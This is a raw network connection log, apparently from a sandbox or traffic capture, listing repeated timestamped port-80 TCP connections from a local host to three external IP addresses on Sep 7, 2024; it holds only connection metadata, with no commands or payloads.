                                                                                                                                                                    Sep 7, 2024 15:36:31.547456026 CEST5803680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:36.343041897 CEST5310080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:36.348032951 CEST805310064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.348113060 CEST5310080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:36.348184109 CEST5310080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:36.353734970 CEST805310064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.353790998 CEST5310080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:36.426469088 CEST5310180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:36.431987047 CEST805310145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.432183981 CEST5310180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:36.433979034 CEST5310180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:36.440475941 CEST805310145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.444226027 CEST5310180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:36.508680105 CEST5310280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:36.514475107 CEST805310245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.514552116 CEST5310280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:36.514717102 CEST5310280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:36.523317099 CEST805310245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:36.523376942 CEST5310280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:38.630331039 CEST5310380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.635396957 CEST805310364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.635476112 CEST5310380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.635554075 CEST5310380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.641350031 CEST805310364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.641398907 CEST5310380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.717299938 CEST5310480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.722187996 CEST805310464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.722263098 CEST5310480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.722349882 CEST5310480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.727576971 CEST805310464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.727633953 CEST5310480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.808635950 CEST5310580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.813585997 CEST805310564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.813673973 CEST5310580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.821371078 CEST5310580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:38.826869011 CEST805310564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.826942921 CEST5310580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:39.052434921 CEST5310680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:39.057262897 CEST805310645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.057324886 CEST5310680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:39.057415009 CEST5310680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:39.062673092 CEST805310645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.062725067 CEST5310680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:39.356853962 CEST5310780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:39.361623049 CEST805310764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.361694098 CEST5310780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:39.368271112 CEST5310780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:39.373131037 CEST805310764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.373788118 CEST5310780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:39.458662987 CEST5310880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:39.463601112 CEST805310888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.464776039 CEST5310880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:39.464879036 CEST5310880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:39.469911098 CEST805310888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.470112085 CEST5310880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:39.958441019 CEST5310980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:39.963246107 CEST805310945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.963304996 CEST5310980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:39.963396072 CEST5310980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:39.968588114 CEST805310945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.970113993 CEST5310980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:40.513884068 CEST5311080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:40.518697023 CEST805311088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.518784046 CEST5311080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:40.518870115 CEST5311080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:40.523998022 CEST805311088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.524156094 CEST5311080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:40.599800110 CEST5311180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:40.605449915 CEST805311164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.605519056 CEST5311180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:40.618282080 CEST5311180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:40.624283075 CEST805311164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.624386072 CEST5311180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:40.676955938 CEST5311280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:40.682847977 CEST805311288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.682931900 CEST5311280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:40.696382046 CEST5311280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:40.703301907 CEST805311288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.703366041 CEST5311280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:41.235040903 CEST5269280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:41.240014076 CEST805269288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.240103960 CEST5269280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:41.240183115 CEST5269280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:41.245505095 CEST805269288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.245565891 CEST5269280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:42.738938093 CEST5269380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:42.743752956 CEST805269345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.743829966 CEST5269380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:42.758913040 CEST5269380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:42.763899088 CEST805269345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.763963938 CEST5269380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:42.893475056 CEST5269480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:42.898241043 CEST805269488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.898317099 CEST5269480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:42.898397923 CEST5269480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:42.903393030 CEST805269488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.903439999 CEST5269480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:43.020311117 CEST5269580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:43.025132895 CEST805269545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.025216103 CEST5269580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:43.025290966 CEST5269580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:43.030407906 CEST805269545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.030540943 CEST5269580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:43.755413055 CEST5269680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:43.762104034 CEST805269664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.762175083 CEST5269680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:43.762262106 CEST5269680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:43.768981934 CEST805269664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.769026995 CEST5269680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:43.816500902 CEST5269780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:43.821305037 CEST805269788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.821393013 CEST5269780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:43.821554899 CEST5269780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:43.826549053 CEST805269788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.826600075 CEST5269780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:44.843204975 CEST5269880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:44.848767996 CEST805269888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.848833084 CEST5269880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:44.852626085 CEST5269880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:44.858490944 CEST805269888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.858552933 CEST5269880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.251147985 CEST5269980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.256023884 CEST805269988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.256160975 CEST5269980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.256236076 CEST5269980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.261280060 CEST805269988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.261343956 CEST5269980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.319081068 CEST5270080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.325831890 CEST805270088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.325902939 CEST5270080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.325974941 CEST5270080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.330981016 CEST805270088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.331047058 CEST5270080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:45.677272081 CEST5270180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:45.682307005 CEST805270145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.682389975 CEST5270180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:45.682653904 CEST5270180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:45.687618971 CEST805270145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.687681913 CEST5270180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:45.738900900 CEST5270280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:45.744595051 CEST805270245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.744671106 CEST5270280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:45.761003017 CEST5270280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:45.765913010 CEST805270245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.765974045 CEST5270280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:46.118145943 CEST5270380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:46.122911930 CEST805270345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.122968912 CEST5270380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:46.123116970 CEST5270380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:46.128020048 CEST805270345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.128065109 CEST5270380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:46.732670069 CEST5270580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:46.737478971 CEST805270564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.737556934 CEST5270580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:46.743855000 CEST5270580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:46.748655081 CEST805270564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.748730898 CEST5270580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:47.038714886 CEST5270680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.044008017 CEST805270645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.044092894 CEST5270680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.055871964 CEST5270680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.060775995 CEST805270645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.060822964 CEST5270680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.179310083 CEST5270780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.185192108 CEST805270745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.185260057 CEST5270780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.185323000 CEST5270780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.191557884 CEST805270745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.191606998 CEST5270780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.379020929 CEST5270880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.383955956 CEST805270845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.384020090 CEST5270880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.384349108 CEST5270880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:47.389529943 CEST805270845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.389590979 CEST5270880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:48.395658016 CEST5270980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:48.400686979 CEST805270988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:48.400749922 CEST5270980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:48.415266037 CEST5270980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:48.420312881 CEST805270988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:48.420382023 CEST5270980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:49.599992037 CEST5271080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:49.604831934 CEST805271088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.604970932 CEST5271080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:49.605067015 CEST5271080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:49.610230923 CEST805271088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.610290051 CEST5271080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:51.564284086 CEST5271180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:51.569097042 CEST805271164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:51.569226980 CEST5271180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:51.569281101 CEST5271180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:51.574250937 CEST805271164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:51.574314117 CEST5271180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.108383894 CEST5013480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.114397049 CEST805013488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.114518881 CEST5013480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.114600897 CEST5013480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.121015072 CEST805013488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.121121883 CEST5013480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.514039040 CEST5013580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.519040108 CEST805013588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.519126892 CEST5013580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.524629116 CEST5013580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.529576063 CEST805013588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.529630899 CEST5013580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:52.688745022 CEST5013680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.693737030 CEST805013664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.693835020 CEST5013680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.693917990 CEST5013680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.699552059 CEST805013664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.699645996 CEST5013680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.987586021 CEST5013780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.992394924 CEST805013764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.992476940 CEST5013780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.993283033 CEST5013780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:52.998367071 CEST805013764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.998434067 CEST5013780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:53.065217972 CEST5013880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:53.070106983 CEST805013888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.070174932 CEST5013880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:53.071500063 CEST5013880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:53.076507092 CEST805013888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.076560974 CEST5013880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:54.123555899 CEST5013980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.128444910 CEST805013964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.128532887 CEST5013980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.133924961 CEST5013980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.139627934 CEST805013964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.139679909 CEST5013980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.206886053 CEST5014080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.211724043 CEST805014045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.211805105 CEST5014080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.211972952 CEST5014080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.216950893 CEST805014045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.217003107 CEST5014080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.279438019 CEST5014180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.284725904 CEST805014164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.284831047 CEST5014180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.284919024 CEST5014180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.290482998 CEST805014164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.290555000 CEST5014180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:54.412753105 CEST5014280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.417648077 CEST805014245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.417737961 CEST5014280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.417784929 CEST5014280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.423033953 CEST805014245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.423106909 CEST5014280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.708444118 CEST5014380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.713320971 CEST805014345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.713454008 CEST5014380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.713551044 CEST5014380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:54.719346046 CEST805014345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.719402075 CEST5014380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:55.212994099 CEST5014480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:55.217881918 CEST805014464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.217978954 CEST5014480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:55.218058109 CEST5014480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:55.223229885 CEST805014464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.223293066 CEST5014480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:55.591681004 CEST5014580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:55.596579075 CEST805014564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.596683979 CEST5014580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:55.602793932 CEST5014580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:55.607757092 CEST805014564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.607840061 CEST5014580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:57.156367064 CEST5014680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:57.161228895 CEST805014645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.161312103 CEST5014680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:57.161463022 CEST5014680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:57.166352987 CEST805014645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.166409969 CEST5014680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:57.800811052 CEST6000580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:57.805764914 CEST806000588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.805823088 CEST6000580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:57.821388006 CEST6000580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:57.826400995 CEST806000588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.826462030 CEST6000580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:58.081985950 CEST6000680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:58.086961031 CEST806000645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.087069035 CEST6000680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:58.087290049 CEST6000680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:58.092303038 CEST806000645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.092355013 CEST6000680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:59.159796000 CEST6000780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:59.164787054 CEST806000764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.164876938 CEST6000780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:59.164952993 CEST6000780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:59.170176029 CEST806000764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.170288086 CEST6000780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:59.809007883 CEST6000880192.168.2.1264.70.19.203
